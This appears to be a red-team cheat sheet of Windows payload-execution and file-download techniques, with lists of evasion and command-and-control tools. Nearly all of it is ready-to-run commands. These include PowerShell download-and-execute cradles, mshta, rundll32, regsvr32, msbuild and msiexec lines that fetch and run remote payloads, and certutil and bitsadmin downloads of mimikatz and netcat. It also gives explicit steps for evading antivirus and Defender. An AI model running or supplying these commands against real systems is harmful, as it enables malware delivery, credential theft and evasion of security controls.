A curated list of tools and techniques written from experience in red teaming and weaponization of malware used in enterprise environments to trigger attacker exploitation code.
The methods outlined below are used to execute payloads on a local machine, hosted from a remote server or run in memory.
Endless methods here, lots of obfuscation techniques, just test and choose one that works in your environment.
- Infoke-Obfuscation Guide: Infamous Powershell obfuscator by Daniel Bohannon
- Invoke-CradleCrafter: Cradle obfuscator by Daniel Bohannon
- Powershell without Powershell.exe
- Powershell Download Cradles: Cradles by HarmJ0y
Basic example to execute in memory:
powershell -nop -c IEX(New-Object Net.WebClient).DownloadString('https://Domain.com/Payload.ps1')
powershell -c IEX (IWR https://Domain.com/Payload.ps1)
Powershell from a WebDAV server:
powershell -exec bypass -f \\webdavserver\folder\payload.ps1
PowerLine - Compile EXE then transfer it to victim machine to execute Powershell commands without Powershell.exe. It has to be compiled with the scripts you wish to load within the config (i.e. PowerUp.ps1, Invoke-Mimikatz.ps1, etc.).
PowerLine.exe -ShowScripts
PowerLine.exe PowerUp "Invoke-AllChecks"
Microsoft binary to execute HTML Application (HTA) files or inline scripts. Frameworks like Empire and Metasploit output HTA payload file formats.
- LOLBAS - Mshta
- MITRE: Mshta
1. mshta vbscript:Close(Execute("GetObject(""script:http://WebServer/payload.sct"")"))
2. mshta https://WebServer/payload.hta
3. mshta \\WebDAVserver\folder\payload.hta
4. mshta script.vba.hta # Execute VBA code embedded in HTA
Microsoft binary to execute code inside a .DLL file. Custom .DLLs can be written in languages such as Csharp to fully bypass detection.
rundll32 C:\yourfile.dll,EntryPoint
--> yourfile.dll is your malicious .DLL
--> EntryPoint is the function called within the .DLL
Run inline VBscript:
rundll32 vbscript:"\..\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("Wscript.Echo ""Hi there!"""),0)
Run remote SCT payload:
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://WebServer/payload.sct");window.close();
Windows .NET executable for building and executing custom Csharp project files on the fly
- Remotely host MsBuild payloads: Remote hosting of MsBuild payloads on WebDav servers to execute locally (April 2020)
Running local XML or Csproj payload files:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe Payload.xml
Running payload hosted on a WebDav server to run in memory:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe \\WebDAVserver\Payload.xml
Windows .NET executable for compiling or launching custom Csharp payloads
Compiling CSharp script to DLL
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library /unsafe /out:installUtil.dll installUtil.cs
Executing compiled DLL with Installutil.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /U installUtil.dll
Windows command-line tool to register and unregister dll files. Can be used to bypass some controls such as AppLocker
Method 1: Web server delivery. Written on disk in IE local cache. Command to run on target machine:
regsvr32 /u /n /s /i:http://yourdomain.com/payload.sct scrobj.dll
Method 2: WebDAV server. Written on disk in WebDAV client local cache. Command to run on target machine:
regsvr32 /u /n /s /i:\\WebDavServer\tmp\payload.sct scrobj.dll
Windows.NET executable tool for registering assembly files
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U payload.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U \\webdavserver\folder\payload.dll
# RegAsm with PowerShell WMI
PS> $WMIExec=(iwmi win32_process -Name create -ArgumentList "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe /u payload.dll")
PS> $WMIExec | select ProcessID
Use Wmic to execute a local or remote XSL (eXtensible Stylesheet Language) file which contains scripting payloads
Execute local/remote file:
wmic os get /format:"https://yourdomain/payload.xsl"
Exeucte some command:
wmic process call create "cmd.exe /c shell.exe"
Both executables are part of the Windows Script Host (WSH) which is used for scripting capabilities. Cscript.exe allows for execution of VBS, JS, and WSH scripts entirely in command-line. Wscript.exe does the same but pops up a Windows dialoge box for user interaction.
- Cscript app whitelisting bypass Cscript.exe methods:
1. Run locally
cscript.exe testscript.vbs
2. WebDav server
cscript //E:jscript \\WebDavServer\folder\payload.vbs
Windows comes with a Windows installer engine for MSI packages to install new apps called Msiexec.exe. Malicious .msi files can be created to execute payloads.
msiexec /q /i http://YourDomain/payload.msi
Windows Control Panel utility to execute control panel item (.CPL) files that are renamed from DLL files
CPL files export the CplApplet
function
control.exe payload.cpl
The methods listed below are used to transfer and download remote files onto target machines for payload execution or post-exploitation activities.
Windows oneliners to download remote payload and execute arbitrary code
The most pervasive method these days which may be monitoried from blue team, logged for later analysis and possibly blocked in some environments.
# DownloadFile method
powershell -c (New-Object System.Net.WebClient).DownloadFile("https://example.com/archive.zip", "%temp%\archive.zip")
# Invoke-Expression one-liner
powershell.exe -nop -w hidden -ep bypass -c "IEX ((new-object net.webclient).downloadstring('https://domain.com/script.ps1'))"
# Invoke-WebRequest method
powershell -c IWR "https://example.com/mimikatz.exe" -OutFile ".\mimikatz.exe"
# Wget in Powershell (Windows 8 and later)
powershell -c wget "http://www.yourdomain.com/file.exe" -outfile "OutputFile.exe"
Linux and Windows 10 (build #17063 and later) operating systems tool to bypass controls since it doesn't get flagged by most AV's (yet).
Reference: https://medium.com/@reegun/curl-exe-is-the-new-rundll32-exe-lolbin-3f79c5f35983
curl -o nc.exe https://yourdomain.com/nc.exe
Windows built-in binary for downloading remote files, encoding and decoding them. Blocked on recent builds of Windows 10 with Defender but will still bypass some other AV vendors like Symantec.
File downloads:
certutil -urlcache -f https://download.sysinternals.com/files/PSTools.env pstools.env
File encoding and decoding:
certutil -encode pstools.zip pstools.env
certutil -decode pstools.env pstools.zip
Windows command-line utility for managing BITS jobs and transferring files. Blocked by modern Windows 10 Defender but can usually be copied to another EXE to bypass.
Basic example:
bitsadmin /transfer job https://Domain.com/Payload.ps1 Payload.ps1
Method to bypass Win 10 Defender by copying "bitsadmin.exe" to a separate file for execution:
copy /Y C:\Windows\System32\bitsadmin.exe %temp%\Update.exe
%temp%\Update.exe /transfer newjob https://Domain.com/mimikatz.exe %temp%\mimikatz.exe
PowerShell method:
PS# Start-BitsTransfer https://Domain.com/mimikatz.exe %temp%\mimikatz.exe
- Veil Evasion: Generate Metasploit based payloads. Includes payload type and encoding options.
- Lucky Strike: PowerShell tool for creating malicious Macro documents.
- Shellter: Automated anti-virus evasion toolkit for payload development. Paid and free versions and fairly easy enough with some base knowledge to create Fully UnDetectable (FUD) payloads.
- Magic Unicorn: Python script by TrustedSec (Dave Kennedy) to generate Powershell commands and payloads as well as various file type payloads (HTA, Marcro, Certutil). It also accepts Cobalt Strike's C# shellcode payloads as input.
- SharpShooter: Python fraemwork to create JavaScript, HTA, VBS (and more) payloads using various techniques and evasion features.
- ScareCrow: Golang payload gen framework with a lot of modern techniques for payloads and evasion. Can work well against AV/EDR with the right payloads.
- Cobalt Strike: Gold standard for red teaming frameworks by many professionals. Costly but effective.
- Sliver: Open-Source C2 framework written in Go by the team at BishopFox, easy to use and setup, only command-line based.
- Mythic: Cross-plantform collaborative open-source C2 that's web-based, pretty easy to setup and a great C2 for Linux/MacOS.
- PoshC2: Extensible open-source Python3 C2 framework.
- Covanent: Open source framework from the makers of Cobalt Strike. Created in C# (.NET Core). Runs and interacts in a similar fashion to Powershell Empire.
- Metasploit: Standard Kali Linux framework, used by hackers, pentesters and script-kiddies alike.
- Powershell Empire: (DEPRECATED) Post-exploitation framework built in Powershell for setting up Listeners, receiving connecting Agents, executing payload Modules and more.